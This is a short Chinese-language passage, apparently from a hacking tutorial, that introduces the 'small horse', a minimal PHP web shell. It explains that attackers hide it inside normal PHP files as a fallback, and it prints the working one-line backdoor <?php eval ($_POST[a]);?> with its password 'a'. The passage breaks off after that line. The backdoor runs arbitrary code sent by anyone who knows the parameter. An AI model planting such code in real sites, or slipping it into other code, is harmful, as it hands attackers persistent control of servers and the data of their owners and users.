首先认识一下小马，一般大马容易暴露，骇客都会留一手，把小马加入正常PHP文件里面 <?php eval ($_POST[a]);?> //密码为a ...